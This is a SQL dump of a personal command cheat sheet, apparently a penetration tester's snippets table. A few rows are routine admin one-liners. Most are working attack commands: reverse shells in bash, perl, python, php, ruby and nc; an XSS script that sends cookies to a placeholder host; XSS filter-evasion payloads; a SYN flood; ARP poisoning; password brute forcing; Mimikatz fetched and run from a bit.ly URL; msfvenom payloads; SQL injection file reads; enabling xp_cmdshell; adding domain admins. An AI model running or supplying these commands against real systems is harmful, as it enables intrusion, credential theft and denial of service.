-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathsnips.sql
1704 lines (1704 loc) · 113 KB
/
snips.sql
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE TblCommand(
CmdID INTEGER PRIMARY KEY,
Cmd BYTE NOT NULL,
cmnt TEXT,
date DATE
);
INSERT INTO "TblCommand" VALUES(0,'RTFM','helpception','2017-01-30');
INSERT INTO "TblCommand" VALUES(1,'for x in $(wbinfo --user-domgroups=S-1-5-21-765160115-1686448762-1307212239-1135); do wbinfo -s $x; done','AD : No clue','2017-01-30');
INSERT INTO "TblCommand" VALUES(2,'awk /^clown/ ''{print "See the",$1,"at the",$3}'' words.txt','Use only the lines that match a given regex:','2017-01-30');
INSERT INTO "TblCommand" VALUES(3,'awk ''{print "Avg for",$1,"is",($2+$3+$4)/3}'' grades.txt','One can do calculations too!','2017-01-30');
INSERT INTO "TblCommand" VALUES(4,'awk ''NR==1;END{print}'' file.txt','Print first and last lines of a file','2017-01-30');
INSERT INTO "TblCommand" VALUES(5,'awk -F ";" ''{print $2}'' file.txt','Use a different field separator','2017-01-30');
INSERT INTO "TblCommand" VALUES(6,'awk ''/start_pattern/,/stop_pattern/'' file.txt','Print a portion of the text','2017-01-30');
INSERT INTO "TblCommand" VALUES(7,'show system mode','show mode of as500','2017-01-30');
INSERT INTO "TblCommand" VALUES(8,'interface GigabitEthernet7;switchport trunk allowed vlan add 2','add vlan to your interface','2017-01-30');
INSERT INTO "TblCommand" VALUES(9,'cvs diff <file>','diff file in cvs','2017-01-30');
INSERT INTO "TblCommand" VALUES(10,'cvs log <file>','show history of files','2017-01-30');
INSERT INTO "TblCommand" VALUES(11,'file=cvs.txt; cvs update -r $(cvs log $file | grep ^revision | sed -n 2p | awk ''{print $NF}'') $file && mv $file{,.old} && cvs update -A $file && mv $file.old $file && cvs commit -m "Reverted to previous version" $file','roll back cvs change','2017-01-30');
INSERT INTO "TblCommand" VALUES(12,'find -L . -type l','find broken symlinks','2017-01-30');
INSERT INTO "TblCommand" VALUES(13,'chkconfig --list','List services started on boot','2017-01-30');
INSERT INTO "TblCommand" VALUES(14,'screen -D -R <session-id>','Hijack screen','2017-01-30');
INSERT INTO "TblCommand" VALUES(15,'ssh -L [lport]:[rip]:[rport] [ip] -N','port forward ','2017-01-30');
INSERT INTO "TblCommand" VALUES(16,'dd if=/dev/zero of=1g.img count=1M bs=1K','1Gig of zeros','2017-01-30');
INSERT INTO "TblCommand" VALUES(17,'chage -l root','get password policy for root','2017-01-30');
INSERT INTO "TblCommand" VALUES(18,'while sleep 1;do tput sc;tput cup 0 $(($(tput cols)-29));date;tput rc;done &','Display system clock in terminal top right corner! :-)','2017-01-30');
INSERT INTO "TblCommand" VALUES(19,'smartctl -d megaraid,0 -x /dev/sda','display disk info','2017-01-30');
INSERT INTO "TblCommand" VALUES(20,'hping3 -1 [ip]','icmp ping','2017-01-30');
INSERT INTO "TblCommand" VALUES(21,'hping3 -8 [port]-[port] -S [ip] -V','syn scan port range with hping','2017-01-30');
INSERT INTO "TblCommand" VALUES(22,'hping3 -A [ip] -p [port]','ACK scan on port','2017-01-30');
INSERT INTO "TblCommand" VALUES(23,'hping3 -2 [ip] -p [port ]','udp port scan ','2017-01-30');
INSERT INTO "TblCommand" VALUES(24,'hping3 -Q [ip] -p [port] -s','Get inital sequence number','2017-01-30');
INSERT INTO "TblCommand" VALUES(25,'hping3 -S [ip] -p [port] --tcp-timestamp','get remote timestamp','2017-01-30');
INSERT INTO "TblCommand" VALUES(26,'hping3 -F -p -U [ip] -p [port]','Xmas'' scan','2017-01-30');
INSERT INTO "TblCommand" VALUES(27,'hping3 -1 [ip].x --rand-dest -I em1','Sweep range for up hosts ie 192.168.1.x','2017-01-30');
INSERT INTO "TblCommand" VALUES(28,'hping3 -9 HTTP -I em1','Intercept all http','2017-01-30');
INSERT INTO "TblCommand" VALUES(29,'hping3 -S [victim] -a [gw] -p [port] --flood','Syn flood victim','2017-01-30');
INSERT INTO "TblCommand" VALUES(30,'display interface brief','hp switch show if info','2017-01-30');
INSERT INTO "TblCommand" VALUES(31,'GET //google.com','get google','2017-01-30');
INSERT INTO "TblCommand" VALUES(32,'hydra -L ~/pentest/lists/users-common.txt -P ~/pentest/lists/500-worst-passwords.txt -t 1 -e ns -f -vV <destination> http-get /','Brute HTTP with hydra -s 443 for ssl','2017-01-30');
INSERT INTO "TblCommand" VALUES(33,'if [ $carprice -gt 20000]; then echo "too much"; else echo "ok"; fi','bash if','2017-01-30');
INSERT INTO "TblCommand" VALUES(34,'<script>i = new XMLHttpRequest(); i.open(''GET'', ''[dest]'' + document.cookie, true); i.send();</script>','Grab the cookie','2017-01-30');
INSERT INTO "TblCommand" VALUES(35,'meterpreter> execute -f cmd.exe -i -H','executes a command on the remote machine (i.e. opens up a command shell)','2017-01-30');
INSERT INTO "TblCommand" VALUES(36,'nmap -sS -P0 -T4 -n -iL info/ips.txt -oA nmap/quick-scan','Quick scan to set us off','2017-01-30');
INSERT INTO "TblCommand" VALUES(37,'nmap -sS -P0 -T4 -Pn -n -iL info/ips.txt -oA nmap/quick-scan','Quick scan of all the hosts (ignore pinging)','2017-01-30');
INSERT INTO "TblCommand" VALUES(38,'nmap -sS -P0 -T4 -p0-65535 -n -g 80 -iL info/ips.txt -oA nmap/source-port','Source port spoofing','2017-01-30');
INSERT INTO "TblCommand" VALUES(39,'nmap -sS -sU -T4 -Pn -p0-65535 -n -iL info/ips.txt -oA nmap/all-ports','All port scan : assume up','2017-01-30');
INSERT INTO "TblCommand" VALUES(40,'nmap -sS -P0 -T4 -n -A -iL info/ips.txt -oA nmap/os-discovery','OS Detection','2017-01-30');
INSERT INTO "TblCommand" VALUES(41,'nmap -sS -P0 -T5 -n -p 1433 -iL info/ips.txt -oA nmap/internal-sqls','Find sql servers','2017-01-30');
INSERT INTO "TblCommand" VALUES(42,'openssl x509 -noout -modulus -in certificate.crt | openssl md5','# Verify the certificate / private key association','2017-01-30');
INSERT INTO "TblCommand" VALUES(43,'openssl x509 -in certificate.crt -text','# Read an OpenSSL certificate','2017-01-30');
INSERT INTO "TblCommand" VALUES(44,'echo "" | openssl s_client -connect [ip]:443 2>/dev/null| grep ^subject | sed ''s/^.*CN=//''','# Grab the hostname in the certificate','2017-01-30');
INSERT INTO "TblCommand" VALUES(45,'ifconfig em1 192.168.0.1 netmask 255.255.255.0 up','# Set a static IP address on an interface','2017-01-30');
INSERT INTO "TblCommand" VALUES(46,'ifconfig eth0 hw ether 00:E0:81:5C:B4:0F','# Change MAC address','2017-01-30');
INSERT INTO "TblCommand" VALUES(47,'ip rule show to match','show routint to match x','2017-01-30');
INSERT INTO "TblCommand" VALUES(48,'skipfish -O -MEU -o results-nonauth -W ~/pentest/wordlists/skipfish.wl -k 00:30:00 https://[ip]','Skipfish scanner','2017-01-30');
INSERT INTO "TblCommand" VALUES(49,'curl -D - --proxy1.0 [ip]:80 -m 2 [url]','# Curl through a proxy (-m = timeout)','2017-01-30');
INSERT INTO "TblCommand" VALUES(50,'curl -k --cookie "[cookie]" [url] --silent | grep "<title>"','# Curl with cookie','2017-01-30');
INSERT INTO "TblCommand" VALUES(51,'smbclient -I 10.50.2.15 -L [domain] -N -U ""','# Null session smb','2017-01-30');
INSERT INTO "TblCommand" VALUES(52,'snmpwalk -v 1 -c public 10.50.100.51','# Default community string in SNMP','2017-01-30');
INSERT INTO "TblCommand" VALUES(53,'ettercap -M arp -T -i em1 -L log /10.50.100.0-254//','# Ettercap arp poisoning','2017-01-30');
INSERT INTO "TblCommand" VALUES(54,'fierce -threads 10 -dns [domain] -wordlist ~/pentest/wordlists/sub-domains-xxl.lst -dnsserver 8.8.8.8 -file fierce.txt','# Fierce (v0.9) - DNS bruteforcer','2017-01-30');
INSERT INTO "TblCommand" VALUES(55,'lsof 2>/dev/null | grep deleted; cat /proc/24702/fd/4','recover file after beinng delted','2017-01-30');
INSERT INTO "TblCommand" VALUES(56,'rpm -qa | less','list installed files','2017-01-30');
INSERT INTO "TblCommand" VALUES(57,'echo "hello fredrick" | sed ''s/.\{4\}$//''','remove 4 chars','2017-01-30');
INSERT INTO "TblCommand" VALUES(58,'cat db.schema | sed G','add space after each line','2017-01-30');
INSERT INTO "TblCommand" VALUES(59,'sed ''s/ *$//;s/$/;/'' linkedin.txt | paste - - - - | tr -d ''\t''','convert a list into a multi line CSV','2017-01-30');
INSERT INTO "TblCommand" VALUES(60,'sed -i ''/^[0-9]/ s/^/sshd: /'' /etc/hosts.allow','# Add to the beginning of the line starting with a pattern','2017-01-30');
INSERT INTO "TblCommand" VALUES(61,'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1','bash reverse shell','2017-01-30');
INSERT INTO "TblCommand" VALUES(62,'perl -e ''use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};''','perl reverse shell','2017-01-30');
INSERT INTO "TblCommand" VALUES(63,'python -c ''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''','python reverse shell','2017-01-30');
INSERT INTO "TblCommand" VALUES(64,'php -r ''$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");''','php reverse shell','2017-01-30');
INSERT INTO "TblCommand" VALUES(65,'ruby -rsocket -e''f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)''','ruby reverse shell','2017-01-30');
INSERT INTO "TblCommand" VALUES(66,'nc -e /bin/sh 10.0.0.1 1234','nc reverse shell','2017-01-30');
INSERT INTO "TblCommand" VALUES(67,'null union all select load_file(''/etc/passwd'')/*','Mysql Read file','2017-01-30');
INSERT INTO "TblCommand" VALUES(68,'exec sp_configure ''xp_cmdshell'', 1 go reconfigure','enable xp_cmdshell','2017-01-30');
INSERT INTO "TblCommand" VALUES(69,'create user victor identified by pass123 temporary tablespace temp default tablespace users;grant connect to victor;grant resource to victor;','oracle add user','2017-01-30');
INSERT INTO "TblCommand" VALUES(70,'insert into mysql.user (user, host, password) values (''victor'', ''localhost'', password(''pass123''))','mysql add user','2017-01-30');
INSERT INTO "TblCommand" VALUES(71,'exec sp_addlogin ''victor'', ''pass123''; exec sp_addsrvrolemember ''victor'', ''sysadmin''','mssql add user','2017-01-30');
INSERT INTO "TblCommand" VALUES(72,'# rm -rf `which nano`; ln -s `which vim` /usr/bin/nano','Fix nano <3 ;)','2017-01-30');
INSERT INTO "TblCommand" VALUES(73,'net start','list windows services','2017-01-30');
INSERT INTO "TblCommand" VALUES(74,'net accounts','list windows password requirements : XXX LOCAL','2017-01-30');
INSERT INTO "TblCommand" VALUES(75,'net accounts /domain','password requirements domain','2017-01-30');
INSERT INTO "TblCommand" VALUES(76,'reaver -i mon0 -c <channel> -b <bssid> -vv','try to reave WPS wifi','2017-01-30');
INSERT INTO "TblCommand" VALUES(77,'<%div style="xss:expression(alert(123))">','.net xss filter evasion','2017-01-30');
INSERT INTO "TblCommand" VALUES(78,'<IMG SRC=jAvascript:alert(''test2'')>','.net xss filter evasion','2017-01-30');
INSERT INTO "TblCommand" VALUES(79,'%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi','UTF7 xss','2017-01-30');
INSERT INTO "TblCommand" VALUES(80,'sl','not ls','2017-01-30');
INSERT INTO "TblCommand" VALUES(81,'command="[cmd]";echo -n xdotool key " "; echo -n $command| sed ''s# #€#g'' | sed -e ''s/\(.\)/\1 /g'' | sed ''s#/#slash#g'' | sed ''s#@#at#g''| sed ''s#€#space#g'' | sed ''s#-#minus#g''|sed ''s#>#greater#g''| sed ''s#+#plus#g'' | sed ''s#"#quotedbl#g'' | sed ''s#~#asciitilde#g'' | sed ''s#\.#period#g'' | sed ''s#_#underscore#g''; echo KP_Enter','Abuse open x11 : Think open term add user add key ;)','2017-01-30');
INSERT INTO "TblCommand" VALUES(82,'echo 1 > /sys/module/usbcore/parameters/old_scheme_first','WIFI enable USB2 before USB3 : helps with passthrough','2017-01-30');
INSERT INTO "TblCommand" VALUES(83,'airodump-ng -f 4000 --cswitch 1 --band abg wlan0mon --output-format csv -w WifiOverview','WIFI : Scan the range in an orderly manner','2017-01-30');
INSERT INTO "TblCommand" VALUES(84,'ifconfig wlan0 down; iwconfig wlan0 mode monitor; ifconfig wlan0 up;','WIFI : Enable monitor mode on interface','2017-01-30');
INSERT INTO "TblCommand" VALUES(85,'yaps.exe -start -start_address [victim] -stop_address [victim] -start_port [port] -stop_port [port] -timeout 5 -resolve n','Yaps windows portscan, upload first duh','2017-01-30');
INSERT INTO "TblCommand" VALUES(86,'cat json.txt | sed "s/false/§false§/g" | sed "s/true/§true§/g" | sed "s/null/§null§/g" | sed "s/:\"/:\"§/g" | sed "s/\",/§\",/g" | sed "s/\"}/§\"}/g" | sed "s/\\[\\]/\\[§§\\]/g"','Burpify JSON request','2017-01-30');
INSERT INTO "TblCommand" VALUES(87,'<script src=//11.11>','mini xss','2017-01-30');
INSERT INTO "TblCommand" VALUES(88,'./msfvenom -p windows/meterpreter/reverse_https -f dll -e x86/shikata_ga_nai -i 30 LHOST=[IP] LPORT=443 > /data/Clients/[FILE]','MSF Venom make dll','2017-01-30');
INSERT INTO "TblCommand" VALUES(89,'runas /user:[DOM]\[USER] [EXE]','Windows run as','2017-01-30');
INSERT INTO "TblCommand" VALUES(90,'accesschk.exe -uwcqv "Authenticated Users" *','Priv esc check weak service perms','2017-01-30');
INSERT INTO "TblCommand" VALUES(91,'Set-ExecutionPolicy unrestricted','powershell bypass block','2017-01-30');
INSERT INTO "TblCommand" VALUES(92,'powershell.exe -noprofile -executionpolicy bypass','powershell bypass block','2017-01-30');
INSERT INTO "TblCommand" VALUES(93,'for host in $(cat ../nmap/[IP File]); do echo "Trying $host"; smbclient -L $host -U [DOM]/[USER]%''[PASS]''; done','loop to find user shares','2017-01-30');
INSERT INTO "TblCommand" VALUES(94,'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://bit.ly/1qMn59d''); Invoke-Mimikatz -DumpCreds"','Invoke mimicatz, can use with psexec for pwnage','2017-01-30');
INSERT INTO "TblCommand" VALUES(95,'procdump.exe -accepteula -ma keepass.exe keepass.dmp','Dump a processes memory for offline abuse','2017-01-30');
INSERT INTO "TblCommand" VALUES(96,'setenforce permissive','kill puppies, you monster (disable SElinux, though seriously just work around it)','2017-01-30');
INSERT INTO "TblCommand" VALUES(97,'for host in $(cat userhosts.txt); do echo $host; psexec.py [DOMAIN]/[user]:''[pass]''@$host ''WMIC ComputerSystem Get UserName''; done | tee loggedin-dirty.txt;cat loggedin-dirty.txt | grep -v "^\[" | grep -v "^Impacket" | grep -v "^Trying" | grep -v "SMB SessionError" | sed ''/^$/d''','loop for who is where','2017-01-30');
INSERT INTO "TblCommand" VALUES(98,'Get-ADUser -filter * -properties * | sort-object passwordlastset | select-object samaccountname, passwordlastset, passwordneverexpires, homedirectory, mail, enabled | Export-csv -path c:\temp\pwprofile.csv','Powershell pasword last changed, run on DC','2017-01-30');
INSERT INTO "TblCommand" VALUES(99,'dnscmd 127.0.0.1 /ZoneExport [FQDN] [OUT].zone','dump dns zone on DC','2017-01-30');
INSERT INTO "TblCommand" VALUES(100,'mount -t cifs \\\\[victim]\\SYSVOL$ -o username=[user],password=[password] mount/; nautilus mount/;','Mount Sysvol share (hosted on the DC)','2017-01-30');
INSERT INTO "TblCommand" VALUES(101,'egrep -r "cpassword|net" mount','Look in ''mount'' for share (mount sysvol first)','2017-01-30');
INSERT INTO "TblCommand" VALUES(102,'or host in $(cat ../nmap/IPs-SMB.txt); do echo $host; psexec.py [DOMAIN]/[user]:''[pass]''@$host "ipconfig"; done | grep "IPv4 Address\|Ethernet adapter\|^[0-9]" | sed ''/^$/d'' | tee dualhomed-search.txt','loop to look for dual homed hosts','2017-01-30');
INSERT INTO "TblCommand" VALUES(103,'for i in `cat smb_up `; do timeout 10 psexec.py [user]:[pass]@$i net localgroup administrators; done | tee local_admin_information','loop to find local admins','2017-01-30');
INSERT INTO "TblCommand" VALUES(104,'egrep -v "(\*\] T|\[\*\] F|[\*\] C|[\*\] U|[\*\] S|[\*\] R)" local_admin_information | egrep -v "(\[\*\] P|\[\*\] R|\[\*\] S|\[\*\] O|\[\*\] U)" | grep -v "Alias name" | grep -v "Administrators have complete" | grep -v \[\!\] | grep -v \[-\] | dos2unix | grep -v "^$" | sed s/"\[\*\] Creating service.*on"/''''/g | grep -v Members | sed s/\\.\\.\\.\\.\\./'',''/g | sed s/"^ "/"€"/g | sed s/''The command completed successfully.''/€/g | tr "\n" "," | tr € "\n" | grep -v "^$" | sort | uniq > local_admins.csv','turn loop for local admins into csv','2017-01-30');
INSERT INTO "TblCommand" VALUES(105,'tsql -S [IP] -U sa -P"[PASS]"','connect to mssql','2017-01-30');
INSERT INTO "TblCommand" VALUES(106,'/opt/impacket/examples/mssqlclient.py [user]:[pass]@[ip] -port [port]','connect to mssql','2017-01-30');
INSERT INTO "TblCommand" VALUES(107,'c:\windows\system32\inetsrv\appcmd.exe list apppool "SharePoint Central Administration v4" /text:ProcessModel.Password','Recover IIS password','2017-01-30');
INSERT INTO "TblCommand" VALUES(108,'netdom query trust','get domain trusts','2017-01-30');
INSERT INTO "TblCommand" VALUES(109,'netsh interface portproxy show all','show native port forwards windows','2017-01-30');
INSERT INTO "TblCommand" VALUES(110,'netsh interface portproxy add v4tov4 protocol=tcp listenport=[lport] connectport=[rport] listenaddress=[lip] connectaddress=[rip]','set native port forward windows','2017-01-30');
INSERT INTO "TblCommand" VALUES(111,'netsh interface portproxy reset','reset native port forward windows','2017-01-30');
INSERT INTO "TblCommand" VALUES(112,'sc query "MpsSvc"','windows firewall status','2017-01-30');
INSERT INTO "TblCommand" VALUES(113,'netsh advfirewall firewall','windows firewall status','2017-01-30');
INSERT INTO "TblCommand" VALUES(114,'tasklist /v','Windows process list','2017-01-30');
INSERT INTO "TblCommand" VALUES(115,'taskkill /f /im [PROCESS]','Windows force kill process','2017-01-30');
INSERT INTO "TblCommand" VALUES(116,'netstat -a | find "LISTENING"','Windows list listening ports','2017-01-30');
INSERT INTO "TblCommand" VALUES(117,'tasklist /FI "IMAGENAME eq [process].exe" /V','Windows open files','2017-01-30');
INSERT INTO "TblCommand" VALUES(118,'bypassuac.exe /c [COMMAND]','ByPassUAC','2017-01-30');
INSERT INTO "TblCommand" VALUES(119,'at [TIME] command.exe /s cmd SYSCMD','Scheduled cmd to run linux','2017-01-30');
INSERT INTO "TblCommand" VALUES(120,'for host in $(cat hosts.txt); do psexec.py [DOM]/[USER]:''[PASS]''@$host "cmd.exe"; done','loop around and open cmd','2017-01-30');
INSERT INTO "TblCommand" VALUES(121,'psexec.py -hashes [LM]:[NTLM] [DOM]/[USER]@[TARGET] "cmd.exe"','PSExec with hashses','2017-01-30');
INSERT INTO "TblCommand" VALUES(122,'rpcclient -U ''[DOMAIN]\[USER]''%''[PASS]'' ''[TARGET]'' -c enumdomusers,enumdomgroups ','RPCClient smb show users and groups','2017-01-30');
INSERT INTO "TblCommand" VALUES(123,'name=sslfile;openssl genrsa -out $name.key 2048;openssl req -new -key $name.key -out $name.csr; openssl x509 -req -days 10 -in $name.csr -signkey $name.key -out $name.crt;openssl pkcs12 -export -clcerts -in $name.crt -inkey $name.key -out $name.p12;openssl pkcs12 -in $name.p12 -out $name.pem -clcerts','Create Self-signed cert / key','2017-01-30');
INSERT INTO "TblCommand" VALUES(124,'wmic service get name,displayname,pathname,startmode','Unquoted Service Paths','2017-01-30');
INSERT INTO "TblCommand" VALUES(125,'sc query','Unquoted Service Paths','2017-01-30');
INSERT INTO "TblCommand" VALUES(126,'sc qc "[SERVICE]"','Unquoted Service Paths','2017-01-30');
INSERT INTO "TblCommand" VALUES(127,'sc config "[SERVICE]" start= auto','Unquoted Service Paths','2017-01-30');
INSERT INTO "TblCommand" VALUES(128,'sc config "[SERVICE]" start= disabled','Unquoted Service Paths','2017-01-30');
INSERT INTO "TblCommand" VALUES(129,'Sub Test();Shell ("powershell");End Sub','VBA launching command','2017-01-30');
INSERT INTO "TblCommand" VALUES(130,'echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET",WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();BinStream = new ActiveXObject("ADODB.Stream");BinStream.Type=1;BinStream.Open();BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile("out.exe");>wget.js','Javascript wget windows oneline : cscript /nologo wget.js http://[IP]','2017-01-30');
INSERT INTO "TblCommand" VALUES(131,'netsh wlan show profile','Windows Wireless','2017-01-30');
INSERT INTO "TblCommand" VALUES(132,'Netsh wlan show profile name="[SSID]" key=clear','Windows Wireless','2017-01-30');
INSERT INTO "TblCommand" VALUES(133,'for host in $(cat localsubnet.txt); do echo "Trying $host"; winexe --user [Domain]/[user]%[pass] //$host "netsh wlan export profile name=[PROFILE] key=clear"; done','loop dump wifi keys','2017-01-30');
INSERT INTO "TblCommand" VALUES(134,'run autoroute -s [CIDR SUBNET]','proxy Metasploit pivot','2017-01-30');
INSERT INTO "TblCommand" VALUES(135,'run autoroute -p','proxy metasploit pivot','2017-01-30');
INSERT INTO "TblCommand" VALUES(136,'background it then run...','proxy Metasploit pivot','2017-01-30');
INSERT INTO "TblCommand" VALUES(137,'use auxiliary/server/socks4a','proxy Metasploit pivot','2017-01-30');
INSERT INTO "TblCommand" VALUES(138,'proxychains cmd','proxy Metasploit pivot','2017-01-30');
INSERT INTO "TblCommand" VALUES(139,'type [FILE]','Cat for windows','2017-01-30');
INSERT INTO "TblCommand" VALUES(140,'net group "Domain Admins" /domain','Domain Admins windows','2017-01-30');
INSERT INTO "TblCommand" VALUES(141,'/data/hacking/theHarvester/theHarvester.py -h -d [domain] -l 1000 -b all | tee harvester-search-[DETAIL].txt','harvester','2017-01-30');
INSERT INTO "TblCommand" VALUES(142,'/data/hacking/theHarvester/theHarvester.py -d [domain] -l 1000 -b linkedin | tee harvester-people-[DETAIL].txt','harvester linkedin','2017-01-30');
INSERT INTO "TblCommand" VALUES(143,'net accounts','windows commandline show pass policy','2017-01-30');
INSERT INTO "TblCommand" VALUES(144,'hping3 [IP] -S -p 80 -Q','TPC Sequence numbers','2017-01-30');
INSERT INTO "TblCommand" VALUES(145,'snmpwalk -v 2c -c [public|private] [IP] > snmpwalk-[public|private]-[IP].txt','SNMP Walk','2017-01-30');
INSERT INTO "TblCommand" VALUES(146,'wine KeeCracker.exe -w /data/hacking/dictionaries/rockyou.dic -t 4 Database.kdbx','KeePass2 Cracking','2017-01-30');
INSERT INTO "TblCommand" VALUES(147,'find / -iname ''[SEARCH TERM]'' 2>/dev/null','Find files','2017-01-30');
INSERT INTO "TblCommand" VALUES(148,'/opt/nessus/bin/nessuscmd -U -O -p[port] -V -i [plugin ID] [target IP]','Single Nessus Module','2017-01-30');
INSERT INTO "TblCommand" VALUES(149,'fierce -threads 10 -dns [DOMAIN] -prefix /data/hacking/dictionaries/fdnslist.txt -dnsservers 8.8.8.8 -format txt -output fierce-[DOMAIN].txt','fierce external','2017-01-30');
INSERT INTO "TblCommand" VALUES(150,'fierce -threads 10 -no arin,tldbf -dns [DOMAIN.LOCAL] -prefix /data/hacking/dictionaries/fdnslist.txt -dnsservers [IP OF DNS SERVER] -format txt -output fierce-[DOMAIN.LOCAL].txt','firece internal','2017-01-30');
INSERT INTO "TblCommand" VALUES(151,'openssl s_client -connect [domain]:443','''Telnet'' s_client to SSL','2017-01-30');
INSERT INTO "TblCommand" VALUES(152,'ike-scan -A -v -id=test -f [input file] -P[PSK output file]','IKE Agressive','2017-01-30');
INSERT INTO "TblCommand" VALUES(153,'psk-crack -d [word list e.g. rockyou.txt] [input key file]','IKE Agressive','2017-01-30');
INSERT INTO "TblCommand" VALUES(154,'ipconfig /displaydns','Windows ARP Cache','2017-01-30');
INSERT INTO "TblCommand" VALUES(155,'use multi/handler','MSFConsole hints','2017-01-30');
INSERT INTO "TblCommand" VALUES(156,'set PAYLOAD windows/meterpreter/reverse_https','MSFConsole hints','2017-01-30');
INSERT INTO "TblCommand" VALUES(157,'set LHOST [IP]','MSFConsole hints','2017-01-30');
INSERT INTO "TblCommand" VALUES(158,'set LPORT 443','MSFConsole hints','2017-01-30');
INSERT INTO "TblCommand" VALUES(159,'set ExitOnSession false','MSFConsole hints','2017-01-30');
INSERT INTO "TblCommand" VALUES(160,'exploit -j','MSFConsole hints','2017-01-30');
INSERT INTO "TblCommand" VALUES(161,'net user [user] [pass] /add /domain','DomainAdmin','2017-01-30');
INSERT INTO "TblCommand" VALUES(162,'net group "Domain Admins" [user] /add /domain','DomainAdmin','2017-01-30');
INSERT INTO "TblCommand" VALUES(163,'net group "Enterprise Admins" [user] /add /domain','DomainAdmin','2017-01-30');
INSERT INTO "TblCommand" VALUES(164,'net localgroup "Remote Desktop Users" [user] /add /domain','DomainAdmin','2017-01-30');
INSERT INTO "TblCommand" VALUES(165,'net localgroup "Administrators" [user] /add','DomainAdmin','2017-01-30');
INSERT INTO "TblCommand" VALUES(166,'exec sp_configure ''show advanced options'', 1','Re-enable MSSQL xp_cmdshell','2017-01-30');
INSERT INTO "TblCommand" VALUES(167,'go','Re-enable MSSQL xp_cmdshell','2017-01-30');
